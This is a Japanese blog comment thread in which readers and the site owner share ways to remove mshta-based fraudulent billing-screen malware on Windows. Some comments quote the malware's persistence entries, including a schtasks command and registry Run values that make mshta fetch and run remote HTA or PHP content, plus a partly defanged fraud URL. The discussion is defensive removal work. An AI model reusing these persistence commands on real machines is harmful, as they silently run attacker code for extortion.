    [ 2011/01/29 17:51 ] [ 編集 ]
    レジストリとかmsconfigとか検索して片っ端から消したら今のところ出てこなくなりました!!
    一昨日ぐらいから誤って押してしまい困っておりました。
    本当に助かりました
    [ 2011/01/29 19:18 ] [ 編集 ]
    あるアニメの動画というリンクで騙されて引っ掛かっちゃいました。
    自分はオナルヒトというサイトに引っ掛かったのですが,レジストリエディタでキーを検索onaruと入力し,
    値のチェックを外します。
    その後レジストリにサイトアドレスの情報を持ったキーが抽出されます。
    その大元のレジストリフォルダを削除すれば,その後は請求画面が表示されなくなります。
    念のために,次を検索を選択し,レジストリ全体を検索することをお勧めします。

    自分の環境はXP(SP3)です。

    怪しいサイトでファイルのダウンロードがあったらキャンセルすべきですね。
    皆さんも気をつけましょう!
    [ 2011/01/30 00:02 ] [ 編集 ]
    コメントありがとうございました。

    >片っ端から消したら
    うっかりさんは、訳がわかってる方だと思いますが、
    初心者の方は、訳もわからず削除しないてくださいね。

    >怪しいサイトでファイルのダウンロードがあったらキャンセルすべきですね。
    いえいえ、怪しいサイトには行かないでください(-_-;)
    [ 2011/01/30 01:19 ] [ 編集 ]
    f!mshtaは怪しいやつと同じ場所です。
    どういうデータだったか・・・すみません。はっきり覚えが・・・
    [ 2011/01/30 13:51 ] [ 編集 ]
    どうやらf!mshtaを削除したのがいけなかったみたいです。
    たぶんそうです。

    削除したレジストリ元に戻す方法ご存じないですか?
    [ 2011/02/02 19:51 ] [ 編集 ]
    感染日(不正請求画面が出るようなサイトを覗いた日)より前に保存された
    「復元ポイント」へ「システムの復元」を行うことで、レジストリの状態を元に戻すことができます。
    記事の駆除方法3のリンク先に詳しいことが書いてありますから参照してみてくださいね。

    この操作によっても不正請求画面が出なくなるはずです。
    [ 2011/02/02 20:55 ] [ 編集 ]
    具体的で分かりやすい解説に感謝です。
    おかげで解決しました。

    私の周りで既に2人目(*_*)
    最初の時はこちらを知らずにあれこれ苦労してやっと直りました。

    初めからここを見ていればもっと簡単に原因と対策が分かったのに…と思いリンクを貼らせていただきました。

    ありがとうございました。
    [ 2011/02/07 12:18 ] [ 編集 ]
    紹介していただいたとのこと、ありがとうございます(^o^)丿
    [ 2011/02/08 22:32 ] [ 編集 ]
    月経葉樹さんのページと以前にどなたかのコメント(かなり最初の方)であった方法を、ためさせて頂きました。 ほとんど全部削除することができました。

    ほとんど、と言うのは『○スタート→ファイル名を指定して実行→msconfig.exeと入れて「スタートアップ」etc』の画面を出すとまだ名前だけは残っています。

    ちなみに私がmashta.exeにたどり着いたのは、タスクマネージャーを押し違法プログラムを×で消したときに少しでる、プロセスのCPU変化で判断しました。

    [ 2011/02/09 02:00 ] [ 編集 ]
    > プロセスのCPU変化で判断しました。
    おー、上級ワザですね。
    [ 2011/02/09 03:12 ] [ 編集 ]
    mshta.exeのプロセスを終了しても、自動起動していたからタスクが怪しいだろうなと思っていました。タスクを見てみると、2分間隔でvbスクリプトを起動していたのでこれで確定しました。vbsファイルはユーザフォルダの中に生成されていました。タスクとvbsファイルの削除で対応完了しました。ありがとうございました。
    [ 2011/02/24 10:32 ] [ 編集 ]
    2分間隔とは、ひどいですねヽ(`△´)ノ
    【駆除方法2】を応用されたということですね。
    新情報ありがとうございました!
    [ 2011/02/25 00:42 ] [ 編集 ]
    私も恥ずかしながらかかってしまったんですが、まだ学生なのでPCに制限がかかっていて、1と3の方法ができないので、手動でどうにかする方法をやってみたんですが、日付検索をしてもでてきません;
    C¥WindowsなんとかTasksはどうやって開くのでしょうか…英文入力苦手><;
    レジストリ内部を検索しても怪しげなファイルは見あたりませんし… うあーーー
    親には絶対ばれたくないので、どうかお願いします!
    かかったサイトは「素人動画サイト」というやつです。
    長文すみません…
    [ 2011/02/27 17:01 ] [ 編集 ]
    質問をそのまま受け取ってお答えすると
    PCの画面の右下のスタートを右クリック→エクスプローラーをクリック
    すると新しい窓が開きますから、左のほうのフォルダ一覧の中から
    マイコンピュータ→C:→WINDOWS→Tasksとクリックしていきます。
    そうすると窓の右にタスクの一覧が現れます。
    請求画面を消した状態で
    怪しげなタスクをフォルダの外に出して、
    再び請求画面が出なくなればそのタスクが原因である可能性があります。

    タスクの内容を確認するには、
    怪しげなタスクを右クリック→プロパティ→タスクTabの中で
    実行するファイル名がわかりますので、
    こうやってチェックすることもできます。

    しかし、ここに原因が必ずあるというわけではありません。
    また、タスクの削除を間違うと必要なタスクを削除してしまいます。
    いろいろ変なことをしてパソコンが使えなくなったらもっとたいへんです。
    残念ながら猛毒きのこさんは、その可能性があります。
    ここは、あきらめておうちの方に事情を話したほうがいいかもしれません。

    アダルトサイトを覗かなくても、掲示板や
    メールに添付されたリンクをクリックしていって請求画面が出てくることもあるそうですから。

    間違っても送金だけは、しないように。
    かえって個人情報を相手に渡すようなもので危険です。
    万一、支払ってしまった場合などは、最寄りの警察署へ相談しましょう。
    また、おうちの方にフィルタリングソフトを入れてもらうといいですね。
    [ 2011/02/27 18:46 ] [ 編集 ]
    情報ありがとう御座います!
    そして返信の早さに驚き。
    タスクについては、パソコンがウインドウズ7なので少し異なっていましたが、見つけることはできました。
    ですが、タスクの中にはいませんでした。
    でも、もう少し悪あがきをしてみようと思います。   
    前回mshtaをいじって止めればいいかと思い、思いつくだけのことはしましたが、制限がかけられていましたし、プロセスを止めても無駄でした。mshtaを止める方法は他にありませんでしょうか…;

    フィルタリングについては、セーフモードを利用して一時的に止める方法を見つけましたので、うかれていたら引っかかったということです;
    十分反省しております……
    でも、親にはいえません。私の父は前の方のように優しくはないので。なので、どうしても自分で終わらせたいんです。パソコンについては下の中くらいしか知りませんが、検索と、ヘルプとサポートを駆使してやっていけると思いますので、どうか、お願いします!!

    3日すぎても消えなかったのですが、「契約期間」とやらをこえれば消えるのでしょうか、これ。
    ともかく、早くなくなって欲しいです。
    [ 2011/02/27 20:39 ] [ 編集 ]
    > そして返信の早さに驚き。
    忙しい時は、コメントを何日もチェックできない時もありますので、
    今回はたまたまお返事がすぐできたのです。

    > フィルタリングについては、セーフモードを利用して一時的に止める方法を見つけましたので、うかれていたら引っかかったということです;
    > 十分反省しております……
    もう、2度とフィルタリングを回避しないでくださいね。
    別のウィルスに感染して個人情報など漏れたらたいへんですから。

    さて、一応、次にすることを考えますと
    Runの中に怪しい物はなかったのですね。
    tasksのタスク一覧の中にvbsファイルを実行しているものは、ありませんでしたか?
    また、感染日時と同じ時間に作成されたファイルの中にhtaファイルがないとすると
    vbsファイルはありませんでしたか?あれば、それは怪しいファイルということになります。

    お父上を存じ上げないので、何とも言えませんが、
    報告すると、そんなにお怒りになりますでしょうか。
    雷ひとつくらいですみませんかね。
    かえって、おまえもコンピュータに詳しくなったな、とほめてくれたりしませんかね。

    >
    > 3日すぎても消えなかったのですが、「契約期間」とやらをこえれば消えるのでしょうか、これ。
    当方は感染したことがないのでわかりませんが、
    もし消えたら、他の方の参考にもなると思いますので、ご報告ください。

    また、他の方で消えたとか消えないとかご経験がある方がいらっしゃいましたら、
    猛毒きのこさんのためにご一報いただけるとありがたいです。
    [ 2011/02/28 01:25 ] [ 編集 ]
    私の成功例?です(まだ確実かはわかりませんが^^;)

    上記の方法でもhtaファイルが見つからなかったので以下のようにやってみました。

    ちなみに、OSはwindows7です。

    ・例の画面が開いてる状態でタスクマネージャを開きます。
    ・アプリケーションのタグの表示画面で、例の画面の表示の部分を右クリック
    ・プロセスの表示を選択
    ・プロセス一覧の画面に自動的に遷移し該当のプロセスが選択されてるので、右クリックで、ダンプファイルの作成を選択
    ・ダンプファイルが作例され、ファイルの場所が表示されるので、そのファイルの拡張子を.txtなどに変更してエディタで開けるようにする(ファイルがでかいので時間がかかります)
    ・あとはそのファイルを開いて、「.hta」で検索すると、ファイルのありかがヒットします!
    ・そのファイルを削除で、今のところ、うまくいってるようです^^
    [ 2011/03/02 01:35 ] [ 編集 ]
    お役にたてればさん、ありがとうございます!
    Windows7で、そういう対処の仕方があるのですね!
    XPでは、
    > 右クリックで、ダンプファイルの作成を選択 
    の部分からができないようですが…。

    手順をまとめていただき、ありがとうございました。
    たぶん確実に削除されたと思います。
    これで救われる方が多くいらっしゃるでしょう。
    (意味がわかる方だけ、トライしてくださいね。)
    [ 2011/03/02 02:59 ] [ 編集 ]
    お役に立てればさんの報告で、いけるところまできたんですけれど、最終的にたどりついたのがnvStart.exeだったのです。そして、つづきの文に/htmlres/start.htaとかかれてあったのですが…
    これは、アプリケーションの中にファイルが潜んでいるのでしょうか!?それとも、また別の意味があるのでしょうか!?
    聞いてばかりですみませんが、超初心者なので…><;
    [ 2011/03/02 21:02 ] [ 編集 ]
    そのファイルhtmlres/start.htaを捜してダブルクリックして
    同じ画面が出てくれば当たり!(削除)でしょう。
    見つからない場合は、nvStart.exe(まともすぎる名前ですが)を
    ダブルクリックすると画面が出てくるかもしれません。
    お役に立てればさん、他の方、どう思われますか?
    [ 2011/03/03 00:00 ] [ 編集 ]
    ノートPCにて感染しました。。
    Alt+F4によって請求画面は出なくなったのですが、
    これだけで大丈夫でしょうか??

    後々高額な請求をされたりしないか心配です。
    [ 2011/03/05 00:44 ] [ 編集 ]
    > ノートPCにて感染しました。。
    > Alt+F4によって請求画面は出なくなったのですが、
    > これだけで大丈夫でしょうか??

    また、出るかもしれません。
    出た時は、記事やコメントを参考にしてみてください。

    >
    > 後々高額な請求をされたりしないか心配です。

    もし、個人情報を入力してしまってしつこく請求された場合は、
    その画面を記録して最寄の消費生活センターに相談しましょう。

    [ 2011/03/05 02:25 ] [ 編集 ]
    返信ありがとうございます!

    しばらく様子を見てみます。
    今後は気軽なクリックはやめるように心がけます。笑
    [ 2011/03/05 02:41 ] [ 編集 ]
    助かりました;;;
    どこのサイトを覗いて引っかかったのかはわかりませんが、こちらの対処法で何とかなりました。

    ありがとうございました^^
    [ 2011/03/05 15:49 ] [ 編集 ]
    良かったです(^^)
    [ 2011/03/05 16:02 ] [ 編集 ]
    私の場合はwin7 64bitですが、C:\Users\ユーザー名\AppData\Roaming\fieldのフォルダ内にregisterと画像ファイルがありそれを削除するといけました、上記に記載されている方法では発見できませんでしたが、Cドライブをファイル名htaにて検索し発見にいたりました。ご報告させていただきます。
    [ 2011/03/06 18:02 ] [ 編集 ]
    私の友人の場合この方法で見つからなかったので
    htaファイルはすぐに検索できない所に作られていると思っていました。
    上の方のコメントでうさぎさんも、そのようなhtaファイルの
    vistaでの削除の方法を紹介してくださっています。

    2010.09.01の治りましたさんからも似た報告がありますが、
    この方法で有効な場合も多くあるということがわかりました。
    ご報告、どうもありがとうございました!
    近いうちに記事にも反映させていただきます。
    [ 2011/03/07 01:35 ] [ 編集 ]
    猛毒きのこさんからのコメントです。
    一応、他の方が間違って踏まないように
    リンクを無効にして掲載させていただきました。

    > これだけヒントをもらっていながら、いまだに攻略できていない猛毒きのこです。
    > 感染した次の日から、、起動したとき限定で謎のアプリケーション(?)の画面が出てきます。
    > 真っ白で何も描かれていませんが、そのアプリケーションのプロパティに
    > 全般 利用不可
    > プロトコル HyperTextTransfer Protocoi
    > 種類 HTML ドキュメント
    > 接続 暗号化無し
    > アドレス(RUL)
    ttp://www.tera.erocenter.info/rog2.php?cid=6a…
    > サイズ 7176バイト
    > と、かかれておりました。
    > Microsoft Excel で開くと、例の画面が現れました。
    > ソースの表示でメモ帳が開かれたので、文字をかえると、C:users~~AppDataLocalMicrosoftWindowsTemporary IntemetFilesContent.IE53H7EXZOXreg2[1]
    > への変更内容を保存しますか?
    > とでたので、全消しして、適当に文字をうってみました
    > が、どうやら無駄だったみたいで、また例の画面がでてきてしまいました。
    > でも、これを利用してどうにか出来るかもしれません。
    > だれか、何かいい方法あれば、教えてほしいです。
    > 英文うつの苦手だぁ…もう二度とこんな事にならないようにしたいです><

    *********************************
    ここからコメントの返信です

    探しあてましたね。
    猛毒きのこさんの場合、起動時にネットに接続して請求画面を出しているのです。
    そのURLが上に記されたものです。

    レジストリの編集ができるのであれば、
    レジストリエディタで
    編集→検索→上のURLの一部を入れて検索してみてはいかがでしょう?
    データに上のURLが書いてあるものがあれば削除します。
    ただし、レジストリの編集はリスクを伴うことを覚悟してください。

    見つからない場合、
    管理者権限がなくてもできる
    システムの復元を試してみては?
    http://pasofaq.jp/controlpanel/nusrmgr/7restration.htm

    うまくいったらご報告よろしくお願いします。
    (レジストリにあった場合は、レジストリの場所も)
    [ 2011/03/07 03:31 ] [ 編集 ]
     百度で検索中、リンクをたどっていくうちに引っかかりました。
     こちらの記述を元に対処したところ、見事にポップアップしなくなりました。ありがとうございます。

     なお、当方が引っかかったのは変異型らしく、悪玉はvespa(無意味な長い数列).vbsというVBスクリプトでMyDocument直下に勝手に居座っていました。感染キーはHKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Runでした。
     


     
    [ 2011/03/07 15:19 ] [ 編集 ]
    私のパソコンはコントロールされていて、mshtaの名前をかえて使えなくすることも、システムの復元も出来ませんでした。アンチウイルスソフト等でふるぼっこすることも、インストール自体禁止されてるので、無理でした;つまり、手動しか方法がないわけで…
    レジストリは、管理人が入れたりした物は無理なようですが、自分の物なら消せるようです。
    そこで、php?と検索してみたところ、Runというのが
    引っかかったので、ためしに、中身の4っつの内一つを
    消したところ、サクッと消えてしまいました。(大丈夫かなあ?)
    どうやらこれは、私が入れた物らしいですけれど、
    Runは怪しいファイルなんでしょうか?
    みなさんも言っていますし…そこのあたりを教えてほしいです。よろしくお願いします。
    [ 2011/03/07 20:24 ] [ 編集 ]
    Y.さん
    MyDocumentに居座るとは、図々しいですね。
    ご報告ありがとうございました。

    猛毒きのこさん
    管理者権限がなくてもできるシステム復元の方法をリンクしてみたのですが、
    (情報処理推進機構のシステムの復元の方法とは違います。)
    レジストリを検索して削除したら画面が消えたのですね。
    削除したレジストリのデータ値がわかるともっと確実ですが、
     自分が作成したレジストリキーであれば削除できること、
     Runにあったこと(ここにあるとOS起動時に自動的に実行されます)、
     画面が消えたこと
    を考えると大丈夫なのでは。
    良かったですね!
    [ 2011/03/07 22:39 ] [ 編集 ]
    再起動するとまた現れましたー。
    でも、まんまとありかを見つけられました!
    のはいいんですが、インターネットショートカットと何かのファイルの2つが、どういう訳か、削除をクリックしてもきえずに、居座っています。
    これは、どう消せばいいのでしょうか!?
    [ 2011/03/13 18:10 ] [ 編集 ]
    情報が少ないので、良くわかりませんが、
    新しいのですか?それとも、前の続きですか?

    いずれにせよ、3/7のコメントにある
    管理者権限がなくてもできるシステムの復元を試してみては?
    [ 2011/03/14 02:02 ] [ 編集 ]
    その方法も試したんですが、見事にシステムの復元という項目がありませんでした。
    何があったのだろう…
    話の続きですが、2つの妙なファイルは、アドレスが
    なんじゃこりゃ にかかれてあったものと同じでした。
    たぶん、そのヘンなファイルがなんどもウェブページを表示させていて、インターネットショートカットが、そのページのショートカットなんだとおもいます。
    ただ、削除できないし、右クリックしても「名前を変更する」という項目がないので拡張子を変えることができず、ドキュメントを開いても属性を変えることができませんでした。
    そのほか色々なことをしたので、これが元凶なのはわかるのですが、どうにも出来ませんでした。
    この意味不明なファイルを使用不可能にできればいいのですが…
    [ 2011/03/14 14:14 ] [ 編集 ]
    一度、請求画面は消えていたのですよね?
    それとも3/7以来、一度も再起動しなかったということですか?
    ご家族との関係上、パソコンの初期化という選択肢も無理でしょうね?

    管理者権限がないので、かなり難しいと思うのですが、
    わかる方がいらっしゃったら、よろしくお願いいたします。
    [ 2011/03/14 16:32 ] [ 編集 ]
    「hta」の拡張子のファイルが検索しても存在しなかったので、「php」で検索したところmap~というファイルが一件該当しました。それを削除したところ、その後は一切広告が出てこなくなりました。ほんと、やっかいなものをクリックしてしまいました。

    なかなか削除できないときはデスクトップ画面左下のスタートメニューをクリックして、スタートメニューアイコンのすぐ上にある検索のところに「php」と入れて検索してみてください。一件だけヒットがあればそれがあの広告のファイルです。
    [ 2011/03/24 20:44 ] [ 編集 ]
    該当したファイルをゴミ箱に入れて、広告が出なくなればそれが原因。
    やっぱり広告が出るようであれば、
    該当したファイルは別に使うファイルかもしれませんから元に戻せばいいですね。
    新しい情報ありがとうございました。
    [ 2011/03/24 22:57 ] [ 編集 ]
    こんにちは。
    ここのサイトの情報は正しいので、感染した報告があった場合に紹介させていただいたりしています。

    本日新しい手口が見えましたのでご報告させていただきます。

    レジストリのいつもの場所に、感染するとこのようなエントリーが出来ます

    schtasks /create /TN Quicktime /tr \"C:\\windows\\system32\\mshta http://***.***.***/User/bill2\" /F /sc minute /mo 1

    Windowsのタスクを作るコマンドです。
    タスク名はQuickTimeですので、いちおうこれの振りということでしょうか。

    あまり創造性のない方法ですが、Windowsのタスクを削除してもレジストリに残っている限り、起動するたびに出てきますのでご報告まで。

    [ 2011/03/26 14:42 ] [ 編集 ]
    情報ありがとうございました。
    次から次に新手が現れますね。
    最大の防御は怪しげなサイトに近づかないことでしょうね。
    [ 2011/03/26 22:27 ] [ 編集 ]
    本当はもっと前に完了できたのですが、色々とあったので、今お伝えします。
    駆除に成功しました!!
    ダンプファイル法と謎のデータをいじったことでしっかりと居場所を突き止めた後、検索せずにしっかりとファイルをさぐっていくと、それらしい物があったので削除をしました。すると、画面に「例の画面」が現れなくなりました!
    (どのファイルかは安心してデータを捨ててしまったため、ここに記述することはできません;すみません)
    私には何があったのかわかりませんが、今度こそちゃんと消えてくれたようです。
    そして、私の質問に答え、色々な手段を教えてくださった月桂樹葉さん始め、書き込んでくれた方々もありがとうございます!私自身、このサイトに必要なさそうなことばかり書いていて、さすがに迷惑だと思っていましたが、それでも答えてくれました。おかげで慌てず対処出来たほか、パソコンにも少し詳しくなれました。
    この経験をいかして、周りでかかってしまった人がいたら助けます!
    これからはサムネイルにほいほいされないよう、こころがけます(_ _ペコリ
    [ 2011/04/03 14:59 ] [ 編集 ]
    お役に立てばさんの方法などでうまくいったということですね。
    良かったです(^^♪
    10代の方だと思いますが、
    皆さんにきちんとお礼を述べられていて好感が持てます。
    また、思い出したことなどがありましたら、ご報告くださいね。
    [ 2011/04/03 20:10 ] [ 編集 ]
    参考にさせていただきました!
    ありがとうございます!

    マイドキュメントフォルダの下にmapping_XXX...XXX.vbsというvbスクリプトを仕込まれ、スタートアップでそのvbスクリプトを呼び出す仕組みでした。

    vbsファイルのファイル名でレジストリエディタ内を検索し、当該レジストリを削除することで対処しました。

    このサイトを見なかったらもっと駆除に時間が掛かってました。ありがとうございます。
    [ 2011/04/09 00:36 ] [ 編集 ]
    わかりやすいご報告ありがとうございました。
    他の方の駆除の参考になると思います。
    [ 2011/04/09 01:23 ] [ 編集 ]
    標準的な駆除方法では消えませんでしたが、このサイトによりVBスクリプト変種である事を知り、駆除出来ました。有難う御座いました。

    御参考迄に当方の状況は、ダウンロードフォルダに「vespa_e6cd0a628b973e30c6a8b81cf422181504762f78.vbs」なるVBスクリプトを作成され、「コンピュータ\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1F20D025-7781-49A6-AD84-A56F62D871F3}」でPathを通されていましたので、このキー及び上記VBスクリプトに加え、「C:\Windows\System32\Tasks」の上記VBスクリプト呼び出しを削除しました(これでOKですよね?)。

    この様に悪質な業者を訴える事は出来ないのでしょうか(URL等わかるので特定可能だと思います)?
    [ 2011/04/10 00:02 ] [ 編集 ]
    ていねいなご報告ありがとうございました。

    > (これでOKですよね?)。
    OKだと思います。

    > この様に悪質な業者を訴える事は出来ないのでしょうか(URL等わかるので特定可能だと思います)?

    URLは、すぐ変わってしまうようですが、有用な情報は
    警察のサイバー犯罪相談窓口
    http://www.npa.go.jp/cyber/soudan.htm
    が通報窓口のようです。
    (後日談をご覧ください。)
    でも相手を特定しようとして、自分から連絡をとらないようにしてくださいね。個人情報が流れると厄介です。

    (後日談)
    上記の相談窓口に対応を伺ってみました。
    ここは、実際に被害にあったときの対応をする所なので、
    被害にあってない場合は、消費者生活センターに知らせてほしいそうです。
    消費者生活センターを通して行政処分をする場合もあるそうです。
    [ 2011/04/10 01:04 ] [ 編集 ]
    PC初心者の友人が感染したらしく、こちらのサイトを参考にしながら電話で指示して修復しました(初心者にレジストリエディタを触らせるのは怖かったのですが・・・)。
    結局、レジストリエディタの「編集」→「検索」で、キーワードに「php」を入れて検索させたところ、
     名前:コマンド
     データ:mshta http://(アダルトサイト)/regist2.php
    が見つかったので、それを削除したところ治りました。
    友人共々、大感謝です。ありがとうございました!
    [ 2011/04/10 22:09 ] [ 編集 ]
    友人思いのfukuさん、ご報告ありがとうございました。
    アダルトサイトのURLが入っているレジストリであれば、ビンゴですね。
    [ 2011/04/11 02:26 ] [ 編集 ]
    お礼を言いたかった
    [ 2011/04/13 18:31 ] [ 編集 ]
    お気持ち伝わりました(^^)
    [ 2011/04/13 18:41 ] [ 編集 ]
    とても参考になりました。
    ありがとうございました。
    [ 2011/04/14 10:34 ] [ 編集 ]
    実はワンクリに引っかかって3ヶ月もほったらかしにしていました。
    そして友達がワンクリに引っかかったと言っていたのを聞き、「もしやワンクリ・・?」と思い、検索したところ、
    ここにたどり着きました。
    それでです。悪さをしているのは「mshta.exe」。実行
    しているユーザーは自分らしい。引っかかったサイト名
    で検索すると、ワンクリだと判明。
    【駆除方法1】試したところ見つからず。
    【駆除方法2】それも見つからず。
    といったところですとても答えづらいかもしれませんが
    、簡単に言うと「どうしたらいいですか?」ということです。長々書いてすみません。よろしくお願いします。
    [ 2011/04/18 18:55 ] [ 編集 ]
    まささん、どういたしましてです。
    ひろさん、
    【削除方法3】、【その他の削除方法】も参考にしてみてください。
    それでも、だめな場合は初期化という手もあります。
    [ 2011/04/18 21:03 ] [ 編集 ]
    最近は自分しないのですが、一応家族で使っているため、
    出来るだけ知られたくないので、電話とかメールは・・・
    。システムの復元はなんとかかんとか権限(アドミニストレーター?みたいなの)が無いので出来ないっぽいです。
    一時的には消せるんですが・・。
    何か出来ませんでしょうか・・・
    [ 2011/04/18 21:40 ] [ 編集 ]
    コメント欄にも解決方法がいろいろあるので、参考にしてみてください。
    特に猛毒きのこさんの奮闘は参考になると思います。

    当方としては、ご家族にカミングアウトして
    管理者権限のあるアカウントから直すことを推奨します。

    前にも書きましたが、変なサイトでなくても
    ワンクリ画面が出ることがありますから。
    [ 2011/04/19 00:03 ] [ 編集 ]
    死闘の末なんとか削除できました。
    [ 2011/04/19 20:07 ] [ 編集 ]
    ひろさん、死闘とは、がんばりましたねv-218
    よろしかったら削除方法を公開していただけると他の方も助かると思います。
    [ 2011/04/19 20:41 ] [ 編集 ]
    レジストリに以下のものが追加されてました。
    レジストリとファイル(cars.hta)を削除して表示されなくなりました。

    "cars"="C:\\WINDOWS\\system32\\mshta.exe \"C:\\Documents and Settings\\ユーザ名\\Application Data\\cars\\cars.hta\""
    [ 2011/04/26 22:53 ] [ 編集 ]
    Application Dataの下に隠れているのもあるのですね。
    ご報告ありがとうございました。
    [ 2011/04/26 23:37 ] [ 編集 ]
    上記【[ 2011/03/24 20:44 ] あ】さんの【phpという名のファイル】を試したらヒット!、まさに日時がそれだったので削除したのですがダメでした。ゴミ箱の中身も全部削除してもNG(><)該当のものでもダメなのは何ででしょうか?ちなみに、当方は【vespa_8c6b328577b6e276c5809a0eccab6fe18dcfeba3
    】種類 VBScript Script ファイル というものでした。ご回答宜しくお願いします!
    [ 2011/05/02 01:17 ] [ 編集 ]
    2011/04/10 00:02 の「御参考」という通りすがりさんのコメントを見てください。
    通りすがりさんは、3種類削除していますね。
    同じようにしてみたらどうでしょうか。
    [ 2011/05/02 02:38 ] [ 編集 ]
    ご回答ありがとうございます。

    実はさっきから4時間以上格闘しております。(vista)

    上記コメントを一通り拝見し、色々試しています。
    「御参考」という通りすがりさんのコメントも試しましたがダメでした。

    復元については感染した何日か後にプログラムの更新?をしてしまっているので意味ないですよね?(復元できる日付が表示されましたがそれ以前の感染でしたので)

    htaファイルはヒットなし。

    一昨日色々試している工程で、「あなたのPCに悪意ある請求プログラムをインストールしようとしています」「悪意あるインストールを拒否できません」のような警告がでたのですが、わけもわからずクリックしてしまったような気がして、後からワンクリックウェア詐欺というものなのかもとかなり不安になってしまっています。

    長文で申し訳ありませんが、良いアドバイス等ありましたらご教示願います。
    [ 2011/05/02 04:21 ] [ 編集 ]
    > 後からワンクリックウェア詐欺というものなのかもとかなり不安になってしまっています。
    >
    こちらから、連絡をとらなければ心配することはありませんが、
    何か心配なことがあれば消費者生活センターに相談してみると良いと思います。

    復元ポイントがないということですので、もう少し詳しく教えてください。
    どういう症状ですか?
    再起動してもすぐ請求画面が出てくるとか、時間が経つと請求画面が出てくるとか、
    何をしても全く請求画面が消せないとか。
    また、削除したのはphpという文字列を含んでいるファイルですか?
    TASKSやレジストリに怪しいものは見つからなかったということですか?

    詳しい情報を公開していただければ、
    御覧になっている方で解決法を教えてくださる方がいらっしゃるかもしれません。

    なお、vbsファイルを検索してみるのも良いかもしれません。
    [ 2011/05/02 13:49 ] [ 編集 ]
    お返事遅くなりました。m(_ _)m
    実は、自分でも良くわからないのですが請求画面でなくなりました。
    恐らく、「御参考」さんの内容を試した後だと思われます。
    当方の場合、「HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\vespa_8c6b328577b6e276c5809a0eccab6fe18dcfeba3」この場所にあったこのファイルが感染した日時のものでした。
    これを削除した後にも請求画面が出たり消したりの繰り返しだったのですが、Alt+F4で画面が消え、さらに再起動したらそれから出てこなくなりました。
    これって成功?ってことかな…
    とりあえずは一安心です。
    色々とご指導いただき本当にありがとうございました。

    そして、今は友人からすすめられた「アバスト」という無料のセキュリティソフトをダウンロードして今後二度とワンクリック詐欺にはひっかからないよう気をつけようと思っています。
    [ 2011/05/04 00:40 ] [ 編集 ]
    消えたとの事、良かったです。
    詳細なご報告をありがとうございました !
    [ 2011/05/04 14:34 ] [ 編集 ]
    システムの復元でとりあえずは出てこなくなりましたが、これは根本的な解決になっているんでしょうか
    言葉の通り前の状態に戻すのであれば大丈夫だとは思いますが

    システムの復元がなんなのか良く分かってなくてすみません(^o^)
    [ 2011/05/05 04:19 ] [ 編集 ]
    > システムの復元でとりあえずは出てこなくなりましたが、これは根本的な解決になっているんでしょうか

    根本的な、の意味はいろいろですが、
    出てこなくなれば、画面を消すのに成功した(解決した)と言っていいでしょう。

    ワンクリック請求では、レジストリを変えられて画面が出ていることが多いので、
    復元によって、レジストリを前の状態に戻すわけです。
    [ 2011/05/05 21:36 ] [ 編集 ]
    おかげ様で消えました。とてもわかりやすい説明で助かりました。
    私はVISTAだったのですが、「システムの復元」で直りました。

    ただ、私の場合は
    ・「システムの復元」を最初しようとしたところ「すで  に起動中」(正確な文面は忘れました、すみませ  ん)的なことになり、できず
    ・下にあった「メモリ診断ツール」をしたところ、勝手 に再起動され、何の表示も出ませんでしたが
    ・その後もう一度「システムの復元」をしたらできるよ うになっていて、日付を前に戻したところ直りました

    ウイルスバスターも入れてるし、お笑い動画を見ようとしていたので大丈夫だと思っていました。で、リンクを押してポチポチしてたらアダルトサイトになってて感染しました。
    当たり前ですが、やっぱりよく見ないとだめですね。そしてセキュリティーソフトを入れてれば安心という慢心も危ないとわかりました。
    なんにせよ月桂樹葉さんのおかげで助かりました。
    ありがとうございます。
    [ 2011/05/06 14:38 ] [ 編集 ]
    今後の心構えがナイスですv-221
    vistaの復元時のご報告ありがとうございました。
    [ 2011/05/06 16:16 ] [ 編集 ]
    以下の内容のコメントをいただきました。
    初心者向きに書いていただいたのですが、
    それでもわかりにくいところがありましたので、要点を中心に編集させていただきました。
    ご容赦を。
    ********************

    名前:糞サイトはコロス
    タイトル:糞サイト情報

    パソコンを再起動して請求画面が出てきた時にブラウザの履歴を確認します。
    Internet Explorerのお気に入りの隣の「履歴」をチェック
    そこに請求画面サイトが表示されてます。
    分からなければ今日の履歴を消して再度起動すれば
    請求画面のサイトの履歴が「今日」のところに表示されています
    そのサイトのアドレスを見ます
    出て無ければその履歴のサイトの名前にマウスを当てて右クリックすると
    プロパティが出て来てアドレスが載ってるのでそのアドレスをコピー

    左下のスタートを押して右側にある「検索」でアドレスを貼り付けて検索する
    (月桂樹葉:検索の時は「ファイルに含まれる単語」の欄に貼り付けるということですね。)
    出てきた関連ファイルで削除したほうがいいものを削除

    出て来た糞サイトのCookie
    ↓↓↓↓↓↓↓↓
    owner@aduit-mov[1]
    アドレスはhttp//aduit-mov(変形しました)

    また消し方を書きに来ます

    ********************

    レジストリの中などもそのアドレスで検索するといいかもしれませんね。
    請求画面がダウンロードされたhtaファイルを表示している場合でも
    そのファイル名がInternet Explorerの履歴に表示されますね!
    (既定ブラウザがInternet Explorerでなくても。)
    ユニークな方法をありがとうございました。すばらしい!
    [ 2011/05/21 22:56 ] [ 編集 ]
    以下は糞サイトはコロスさんの上の投稿の続きです。あえて未修正にしました。
    順番が逆になってしまうため、新コメントとして載せさせていただきました。

    この方法は、上記のサイトhttp//aduit-mov/からの請求画面を消すための方法のようです。
    あくまでも自己責任で。初心者には荷が重いかも。初心者は復元がオススメ。

    なお、下記のhttp//windows-service6248.me/というサイトは、
    http//aduit-mov/のサイトにリダイレクトしています。
    また、糞サイトというのは、請求画面を出しているサイトです。念のため(汗)。
    (ここまで月桂樹葉)

    ********************

    名前:糞サイトはコロス


    左下のスタートをクリック
    右側にファイル名を実行

    ってのがあるのでそこをクリック
    そしてregditって文字を打つ

    レジストリエディタが出て来たら左上の編集をクリック
    そして検索でmshta.exeを検索


    検索して糞サイトのアドレスが無いか確認

    HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun


    有れば右側の名前のとこでアドレスを消去

    名前
    system_boot_Ta4rimpfxXitb7B2lsKLFyxDaysASBAE

    ココに糞サイトの情報が出て来ます

    データ
    C:WINDOWSsystem32mshta
